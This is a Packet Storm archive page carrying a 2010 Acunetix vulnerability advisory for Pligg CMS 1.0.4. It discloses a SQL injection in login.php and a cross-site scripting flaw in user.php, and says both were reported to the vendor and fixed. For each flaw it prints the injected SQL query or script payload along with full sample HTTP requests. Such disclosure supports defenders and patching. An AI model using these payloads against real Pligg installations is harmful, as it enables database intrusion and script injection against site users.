exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pligg 1.0.4 SQL Injection

Pligg 1.0.4 SQL Injection
Posted Sep 3, 2010
Authored by Bogdan Calin | Site acunetix.com

Pligg version 1.0.4 suffers from additional remote SQL injection vulnerabilities outside of the previously discovered findings.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | bd510dfa8c37dd79fb700a945f23a47f0bda0d46ad0b2c4cc73c2acdada49063

Pligg 1.0.4 SQL Injection

Change Mirror Download
While beta testing the latest version of Acunetix WVS v7, we found a
large number of security vulnerabilities in various web applications. In
the following days we will publish some of these vulnerabilities. Note
that we will not publish vulnerabilities found in applications that are
not commonly used or in beta stage.

One of the tested web applications is Pligg:

Pligg is an open source CMS (Content Management System) that you can
download and use for free. Pligg CMS provides social publishing software
that encourages visitors to register on your website so that they can
submit content and connect with other users.

The following web vulnerabilities were found in Pligg CMS Version 1.0.4;

1. SQL injection in “/pliggcms_1_0_4/login.php“, parameter “email“.
2. Cross-site Scripting vulnerability in “/pliggcms_1_0_4/user.php“,
parameter “category“.

Technical details about each web vulnerability are below;

1. SQL injection in “/pliggcms_1_0_4/login.php“, parameter “email“.

Source file: /var/www/pliggcms_1_0_4/libs/db.php line: 222
Additional details:
SQL query:

SELECT * FROM `pligg_users` where `user_email` = '1ACUSTART'"*/rn
ACUEND' AND user_level!='Spammer'

Stack trace:
1. ezSQL_mysql::query([string] "SELECT * FROM `pligg_users` where
`user_email` = '1ACUSTART'"*/rn ACUEND' AND user_level!='Spammer'")
2. ezSQLcore::get_row([string] "SELECT * FROM `pligg_users` where
`user_email` = '1ACUSTART'"*/rn ACUEND' AND user_level!='Spammer'")

Same HTTP request:

POST /pliggcms_1_0_4/login.php HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=4c7d8e111f3ec5e90e664e26f365cc04; mnm_user=tmp;
mnm_key=dG1wOjIyZkpqa1BveUhCVFE6NWY1YTg5NTJkYzUzODI4NGYwOTA0Y2Q0NTUzNzk5NDE%3D;
template=wistie
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f


2. Cross-site Scripting vulnerability in “/pliggcms_1_0_4/user.php”,
parameter “category”.

URL encoded GET input categorywas set to " onmouseover=prompt(938687) bad="

The input is reflected inside a tag element between double quotes.
The input is reflected inside a tag element between single quotes.

Sample HTTP request
POST
/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search
HTTP/1.1
Content-Length: 9
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=4c7d8e111f3ec5e90e664e26f365cc04; mnm_user=tmp;
mnm_key=dG1wOjIyZkpqa1BveUhCVFE6NWY1YTg5NTJkYzUzODI4NGYwOTA0Y2Q0NTUzNzk5NDE%3D;
template=wistie
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

username=

These vulnerabilities were reported to the Pligg team on 22/7/2010 via
the contact form from their website and they were fixed in latest
version of Pligg. If you are using Pligg, download the latest version
from their website.

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close